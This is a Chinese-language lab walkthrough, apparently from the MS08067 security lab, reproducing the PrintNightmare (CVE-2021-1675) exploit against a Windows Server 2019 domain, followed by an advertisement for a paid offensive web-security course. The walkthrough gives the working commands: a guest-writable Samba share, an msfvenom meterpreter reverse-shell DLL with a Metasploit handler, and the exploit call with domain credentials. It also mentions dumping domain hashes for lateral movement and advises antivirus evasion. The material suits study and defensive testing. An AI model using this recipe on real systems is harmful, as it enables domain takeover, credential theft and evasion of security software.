文章來源|MS08067安全實驗室
本文作者:龍諾(Web知識星球追洞小組)
一 準備環境
實驗環境:windows2019 (192.168.189.145)
kali linux (192.168.189.146)
需要:一個普通的域賬戶
需要:開啟 print spooler服務
使用反彈shell :需要關閉windows2019的安全中心 或者用免殺
需要:windows2019安裝smb1協議(沒有這個會報錯)
二 搭建環境
安裝impacket
我這里使用的是python虛擬環境安裝搭建這樣的好處是不破壞系統環境,因為python有時候安裝各種模塊多了容易沖突所一我們使用虛擬環境,
構造虛擬環境
virtualenv -p python3 檔案夾
如果沒有virtualenv的話需要你pip安裝模塊
構造完成以后我們使用
source 檔案夾/bin/activate
進入后我們去github下載poc安裝
git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket
首先要下載poc impacket模塊然后安裝

因為我們使用的是虛擬環境所以我們可以直接安裝安裝完以后切換到poc處就可以了
source 檔案夾/bin/activate python setup.py install python CVE-2021-1675.py -h
配置smb服務器
[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2
[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes
按照這個配置以后就可以使用impacket-smbserver 檔案名、目錄、開啟服務器,如圖

生成dll和啟動msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit



利用漏洞
python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\\192.168.189.146\smb\rever.dll'

如果出錯則需要安裝smb1在windows2019上出錯代碼,下圖

可以現在2019連接smb服務器出現這種報錯

成功,下圖

impacket-smbserver服務器也會有資料互動

同時會有反彈shell

我們可以直接查看域中賬戶hash 進行橫向滲透

dll檔案在windows
上傳成功,如果開著windows安全中心會出現圖

上傳不成功

這里就要考慮免殺了,切記只能是普通賬戶

漏洞掃描
https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare

總結
需要了解smb配置
windows2019域配置
在kali無法連接2019的時候逆向思考看看2019可以連接smb共享檔案碼?
https://github.com/cube0x0/CVE-2021-1675/issues/36 這里也有人問這個問題我不知道他解決了嗎?

我是受下面一句話很長時間突然開悟了2019可以鏈接嗎?
復現看著簡單但是各種環境問題還有小白配置問題只有復現了才知道!
追洞小組負責人Taoing主講
WEB高級攻防實戰班 第1期 來襲
課程圍繞:外圍打點、邊界突破、PHP審計、SRC漏洞挖掘、應急回應
課程大綱(最新)
*大綱僅作為參考,會根據當期進度有所變化(加客服獲取高清課程導圖)
課程目錄(最新)

課程費用
每期班定價2999,第一期班首發價:2499(前50名送365元Web安全知識星球名額),每個報名學員都可享受一次免費的重聽權益,一次沒學懂就再來一遍,后續培訓可任選一期來聽,請有意參加培訓的學員抓緊報名!
支持支付寶、信用卡、花唄分期,對公轉賬,可開發票!
學習資源
前50名報名同學,送365元Web知識星球名額,可提前先行學習Web安全相關知識,并提供課程中需要的相關軟體和環境,
上課時間
每周一、二、三、四的晚上 19:00-21:00 ,共24天,48課時,為期6周,如果無法準時參加直播課程,在線培訓的每節課程都會被錄制成視頻上傳到學員區,可隨時下載觀看,
上課方式
培訓采用在線直播+隨堂錄播+微信群解答的形式,無需等待,報名后立即進入“Web星球”開始預習,
講師介紹
Taoing:MS08067安全實驗室核心成員,Web安全知識星球合伙人,安恒資訊安全高級工程師,擅長企業安全研究、情報分析、滲透測驗,安全開發,
TtssGkf:MS08067安全實驗室核心成員,Web安全知識星球合伙人,Defcon Group 86021議題分享者,致力于漏洞分析、代碼審計、漏洞挖掘,
你距離大佬,只差一個決定
詳情咨詢請聯系小客服
掃描下方二維碼加入星球學習
加入后邀請你進入內部微信群,內部微信群永久有效!




來和5000+位同學一起加入星球學習吧!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/295329.html
標籤:其他

